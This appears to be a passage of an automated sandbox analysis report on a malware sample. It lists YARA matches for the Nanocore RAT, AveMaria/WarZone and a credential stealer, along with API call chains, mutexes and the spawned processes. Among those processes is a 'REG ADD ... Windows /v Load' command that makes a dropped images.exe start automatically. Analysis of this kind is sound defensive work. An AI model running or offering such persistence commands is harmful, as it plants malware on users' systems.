Source: 40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.2d3334c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3fe9487.14.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.6c80000.35.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.6c80000.35.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.5280000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.5280000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.3d0d051.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 40.2.KetqqsbuJ.exe.2d270d0.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 40.2.KetqqsbuJ.exe.3e7fc2f.13.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 40.2.KetqqsbuJ.exe.3e88e65.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.480758507.0000000003F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: KetqqsbuJ.exe PID: 5916, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: Xjf4yH9N2t.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: images.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: microC[1].exe.22.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: KetqqsbuJ.exe.22.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dhcpmon.exe.40.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@27/18@11/2

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Code function: 7_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xjf4yH9N2t.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{6a1c2465-7ac5-4f1d-acc5-ef04fcf454c9}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5524:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_01

Source: Xjf4yH9N2t.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\ProgramData\images.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\KetqqsbuJ.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\ProgramData\images.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\ProgramData\images.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\images.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\images.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: images.exe, 00000016.00000002.481576820.000000000446C000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe

File read: C:\Users\user\Desktop\Xjf4yH9N2t.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe 'C:\Users\user\Desktop\Xjf4yH9N2t.exe'
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Users\user\Desktop\Xjf4yH9N2t.exe C:\Users\user\Desktop\Xjf4yH9N2t.exe
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\Desktop\Xjf4yH9N2t.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
